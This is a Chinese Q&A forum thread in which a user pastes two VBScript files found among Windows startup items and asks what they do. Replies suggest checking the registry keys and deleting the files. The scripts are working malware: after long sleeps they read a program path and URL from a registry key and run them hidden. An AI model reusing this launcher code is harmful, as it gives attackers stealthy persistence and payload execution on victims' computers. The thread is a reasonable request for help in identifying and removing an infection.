午餐有时.vbs:Set w = WScript.CreateObject("WScript.Shell")
On Error Resume Next
wscript.sleep 300000
Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_Users = &H80000003
Const HKEY_Current_Config = &H80000005
Const REG_SZ = 1
Const REG_EXPAND_SZ = 2
wscript.sleep 150000
Const REG_BINARY = 3
Const REG_DWORD = 4
Const REG_MULTI_SZ = 7
Const KEY_QUERY_VALUE = &H0001
Const KEY_SET_VALUE = &H0002
Const KEY_CREATE_SUB_KEY = &H0004
Const DELETE = &H00010000
strComputer = "."
Set oRe=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyRoot = HKEY_CURRENT_USER
Regpath = "HKEY_CURRENT_USER"
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\59361"
oRe.GetStringValue strKeyRoot, strKeyPath,"HttpSave" , strHttpSave
oRe.GetStringValue strKeyRoot, strKeyPath,"HttpURL" , strHttpURL
wscript.sleep 150000
w.run """" & strHttpSave & """" & " " & strHttpURL,vbhide
Set Wsh=NoThing
WScript.quit
队伍.vbs:Set w = WScript.CreateObject("WScript.Shell")
On Error Resume Next
wscript.sleep 300000
Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_Users = &H80000003
Const HKEY_Current_Config = &H80000005
Const REG_SZ = 1
Const REG_EXPAND_SZ = 2
wscript.sleep 150000
Const REG_BINARY = 3
Const REG_DWORD = 4
Const REG_MULTI_SZ = 7
Const KEY_QUERY_VALUE = &H0001
Const KEY_SET_VALUE = &H0002
Const KEY_CREATE_SUB_KEY = &H0004
Const DELETE = &H00010000
strComputer = "."
Set oRe=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyRoot = HKEY_CURRENT_USER
Regpath = "HKEY_CURRENT_USER"
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\21454"
oRe.GetStringValue strKeyRoot, strKeyPath,"HttpSave" , strHttpSave
oRe.GetStringValue strKeyRoot, strKeyPath,"HttpURL" , strHttpURL
wscript.sleep 150000
w.run """" & strHttpSave & """" & " " & strHttpURL,vbhide
Set Wsh=NoThing
WScript.quit
启动项里的
有什么作用啊?是什么病毒产生的?
vbs病毒代码,高手来下 启动项里的
答案:2 悬赏:40 手机版
解决时间 2021-04-09 03:51
- 提问者网友:我一贱你就笑
- 2021-04-08 09:14
最佳答案
- 五星知识达人网友:琴狂剑也妄
- 2021-04-08 09:56
你打开regedit,展开Software\Microsoft\Windows\CurrentVersion\21454和Software\Microsoft\Windows\CurrentVersion\59361看里面有什么。
全部回答
- 1楼网友:千夜
- 2021-04-08 10:12
是不是病毒就是看system.exe这个是什么作用了
完全有他决定。
理论上,应该还会有个autorun.inf,把他们都删除吧
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯